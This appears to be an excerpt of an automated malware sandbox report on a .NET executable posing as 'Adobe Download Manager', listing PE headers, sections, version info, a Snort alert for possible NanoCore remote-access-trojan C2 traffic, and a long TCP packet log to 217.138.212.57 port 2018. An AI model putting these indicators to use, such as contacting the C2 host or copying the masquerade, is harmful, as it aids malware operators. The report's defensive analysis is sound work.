                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x8c6980x4f.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x8e0000x2d0c.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x920000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x8c67c0x1c.text
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000x8a6f00x8a800False0.74459012579data6.19707511101IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x8e0000x2d0c0x2e00False0.148522418478data3.29118714119IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x920000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountry
                                                                          RT_ICON0x8e1000x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 134217728, next used block 117440512
                                                                          RT_GROUP_ICON0x906b80x14data
                                                                          RT_VERSION0x906dc0x430data
                                                                          RT_MANIFEST0x90b1c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                          Imports

                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain

                                                                          Version Infos

                                                                          DescriptionData
                                                                          Translation0x0000 0x04b0
                                                                          LegalCopyrightCopyright 2019 Adobe Inc. All rights reserved.
                                                                          Assembly Version2.0.0.592
                                                                          InternalNameConsoleApp18709999999999999999.exe
                                                                          FileVersion2.0.0.592
                                                                          CompanyNameAdobe Inc
                                                                          LegalTrademarks
                                                                          CommentsAdobe Download Manager
                                                                          ProductNameAdobe Download Manager
                                                                          ProductVersion2.0.0.592
                                                                          FileDescriptionAdobe Download Manager
                                                                          OriginalFilenameConsoleApp18709999999999999999.exe

                                                                          Network Behavior

                                                                          Snort IDS Alerts

                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                          07/22/21-09:33:52.108416TCP2025019ET TROJAN Possible NanoCore C2 60B497042018192.168.2.3217.138.212.57

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jul 22, 2021 09:33:50.806400061 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:51.963380098 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:51.963871002 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:52.108416080 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:53.019690990 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:53.019798040 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:53.281886101 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:53.282010078 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:53.799725056 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:53.799973965 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:54.673887014 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:54.712150097 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:55.432821035 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.470251083 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.487173080 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.487313032 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:55.514666080 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.542630911 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.542725086 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:55.568679094 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.598782063 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.598872900 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:55.638338089 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.673640966 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.673707962 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:55.700371027 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.727716923 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:55.727771997 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.197894096 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.224483013 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.224617958 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.250488997 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.273921013 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.273997068 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.292437077 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.328677893 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.328763008 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.359198093 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.386095047 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.386173010 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.408067942 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.432426929 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.433077097 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.453711987 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.488806963 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.488982916 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.507988930 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.528382063 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.529011011 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.558902025 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.586736917 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.586827993 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.609428883 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.637464046 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.637551069 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.663389921 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.685360909 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.686065912 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.882875919 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.914400101 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.914520979 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.929743052 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.953509092 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.953849077 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.973794937 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.005930901 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.006145000 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.034375906 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.057420015 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.057521105 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.088378906 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.123553038 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.123647928 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.149461985 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.167922974 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.168118000 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.196690083 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.224085093 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.224186897 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.254780054 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.286422968 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.286598921 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.313440084 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.339306116 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.339427948 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.367708921 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.393449068 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.393815994 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.419385910 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.448307037 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.449094057 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.472345114 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.490677118 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.493109941 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.512346029 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.531621933 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.531805992 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.565617085 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.600038052 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.600147963 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.627315044 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.649420023 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.651932001 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.685394049 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.709357977 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.709516048 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.727998018 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.756439924 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.756548882 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.788338900 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.815972090 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.816129923 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.848416090 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.876765966 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.876846075 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.901365042 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.929755926 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.929888964 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.953505993 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.970360994 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.977525949 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.977705956 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.007711887 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.007833004 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.036288977 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.036396027 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.065438032 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.065526962 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.090743065 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.091059923 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.116054058 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.116194963 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.141679049 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.142575979 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.170353889 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.170442104 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.190574884 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.190653086 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.208452940 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.208565950 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.245791912 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.247507095 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.270452976 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.270591974 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.290522099 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.290663958 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.315365076 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.315468073 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.347409964 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.347614050 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.366439104 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.366560936 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.394625902 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.394722939 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.413409948 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.413546085 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.447184086 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.447299004 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.485466957 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.485636950 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.499453068 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.499569893 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.544435024 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.544568062 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.567475080 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.567565918 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.602224112 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.602329969 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.630417109 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.630613089 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.650666952 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.650803089 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.688375950 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.688538074 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.716331005 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.716440916 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.742325068 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.742399931 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.768410921 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.768518925 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.804416895 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.804524899 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.831408024 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.831535101 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.851070881 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.851517916 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.890429974 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.890901089 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.914354086 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.914544106 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.938520908 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.939717054 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.957366943 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.959057093 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:58.974874973 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:58.974972010 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.006392002 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.006573915 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.022389889 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.022502899 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.037319899 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.038822889 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.050276041 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.050388098 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.064431906 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.064519882 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.088741064 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.089245081 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.111320972 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.111830950 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.126399994 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.126507998 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.146881104 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.147097111 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.165412903 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.169356108 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.175302029 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.197238922 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.197664976 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.206608057 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.218322992 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.218430996 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.230401993 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.243815899 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.243977070 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.255387068 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.265451908 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.265589952 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.278846979 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.287462950 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.287570953 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.298373938 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.308828115 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.308973074 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.319272995 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.330368042 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.333228111 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.342777967 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.359487057 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.359646082 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.368436098 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.380326986 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.380441904 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.389435053 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.399447918 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.399561882 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.411402941 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.423778057 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.425244093 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.434391022 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.443357944 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.443479061 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.453443050 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.462841988 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.462966919 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.471507072 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.479412079 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.479569912 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.491390944 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.500348091 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.500430107 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.508771896 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.516434908 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.516561031 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.523317099 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.531476021 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.531641960 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.539829969 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.577497005 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.581422091 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.590446949 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.627419949 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.627604008 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:59.635809898 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.648449898 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:59.648989916 CEST497042018192.168.2.3217.138.212.57
